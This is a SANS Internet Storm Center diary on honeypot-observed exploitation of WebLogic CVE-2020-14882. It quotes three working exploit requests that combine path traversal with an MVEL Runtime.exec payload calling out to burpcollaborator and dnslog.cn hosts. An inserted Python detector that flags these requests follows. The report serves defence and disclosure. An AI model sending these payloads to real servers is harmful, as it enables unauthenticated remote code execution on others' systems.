Just about a week ago, as part of a massive quarterly "Critical Patch Update" (aka "CPU"), Oracle patched CVE-2020-14882 in WebLogic. Oracle at the time assigned it a CVSS score of 9.8. We are now seeing active exploitation of the vulnerability against our honeypot after PoC exploits had been published.
Vulnerable WebLogic Versions:
10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
The exploitation of the vulnerability is trivial. For example, these are exploit requests we are currently seeing:
[the honeypot's IP has been replaced with AAA.BBB.CCC.DDD; spaces added to allow for line breaks]
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec(%27cmd /c
GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession( "java.lang.Runtime.getRuntime().exec( 'nslookup%20AAA.BBB.CCC.DDD.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net')
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec( %27ping%20AAA.BBB.CCC.DDD.uajiak.dnslog.cn%27);%22);
These exploit attempts are right now just verifying if the system is vulnerable. Our honeypots (up to now) do not return the “correct” response, and we have not seen follow-up requests yet.
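The three requests above share two traits that a defender can key on: a double-percent-encoded ".." inside the unauthenticated /console/images/ path (so the request reaches console.portal without a login), and a "handle" parameter carrying an MVEL ShellSession / Runtime.exec string. The following Python is an added example, not part of this diary and not SANS ISC code, that decodes request lines until no percent-encoding is left and flags those two indicators. The sample request lines, the function names (fully_decode, classify_request, scan) and the verdict labels are this example's own; the first two sample lines mirror the probes above with the attackers' callback domains replaced by example.invalid.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines in "METHOD target [HTTP/x]" form. The first two
# mirror the probe shape shown in the diary (honeypot placeholder AAA.BBB.CCC.DDD kept,
# DNS callback domains replaced by example.invalid); the rest are constructed benign and
# borderline requests for comparison.
SAMPLE_REQUESTS = [
    "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1"
    "&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime()"
    ".exec(%27ping%20AAA.BBB.CCC.DDD.example.invalid%27);%22);",
    "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel="
    "&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime()"
    ".exec('nslookup%20AAA.BBB.CCC.DDD.example.invalid')",
    "GET /console/images/%2e%2e/console.portal?_nfpb=true&_pageLabel=HomePage1",
    "GET /console/images/logo.png HTTP/1.1",
    "GET /console/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1",
]

# '..' as a whole path segment once every layer of percent-encoding is removed
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
# Strings that only show up when the 'handle' parameter is abused to evaluate MVEL
HANDLE_MARKERS = ("mvel2", "ShellSession", "Runtime.getRuntime().exec")


def fully_decode(s, max_rounds=5):
    """Percent-decode until the string stops changing (%252E -> %2E -> '.')."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(request_line):
    """Return (verdict, reasons) for one request line.

    verdict is 'exploit' (traversal plus MVEL handle), 'suspicious' (only one of
    the two indicators), 'benign', or 'malformed'.
    """
    parts = request_line.split()
    if len(parts) < 2:
        return "malformed", ["no request target"]
    raw_path, _, raw_query = parts[1].partition("?")
    path = fully_decode(raw_path)
    query = fully_decode(raw_query)

    reasons = []
    # Indicator 1: '..' under the unauthenticated /console/images/ tree, which the
    # probes use to reach console.portal without credentials
    if path.startswith("/console/images/") and TRAVERSAL.search(path):
        reasons.append("traversal under /console/images/ to " + path.rsplit("/", 1)[-1])
    # Indicator 2: the handle parameter carrying an MVEL ShellSession / exec string
    hits = [marker for marker in HANDLE_MARKERS if marker in query]
    if hits:
        reasons.append("MVEL handle markers: " + ", ".join(hits))

    if len(reasons) == 2:
        return "exploit", reasons
    if reasons:
        return "suspicious", reasons
    return "benign", reasons


def scan(request_lines):
    """Classify every line; returns a list of (line_number, verdict, reasons)."""
    return [(i, *classify_request(line)) for i, line in enumerate(request_lines, 1)]


if __name__ == "__main__":
    for number, verdict, reasons in scan(SAMPLE_REQUESTS):
        print(f"line {number}: {verdict:<10} {'; '.join(reasons)}")
```

Decoding is repeated rather than done once because the probes encode the dots twice (%252E), so a single unquote still sees "%2E%2E" and a naive ".." check misses it; matching on the fully decoded path mirrors what the server ends up routing. The traversal-only case is reported as "suspicious" rather than dropped, since it is the part of the request that bypasses authentication and is worth a look even without a payload.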
Currently, exploit attempts originate from these 4 IP addresses:
First IP seen, around noon UTC Oct 18th. Attempting to ping [some id].dnslog.cn. Address assigned to China Unicom.
Attempting to ping [victim ip].uajiak.dnslog.cn. Address assigned to Linode (USA).
At this point the most prolific scanner; attempting to execute "cmd /c"? The address is assigned to MivoCloud (Moldova).
Pinging [some ID].burpcollaborator.net. Address assigned to Datacamp Ltd (Hong Kong).
I am in the process of notifying the ISPs.
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.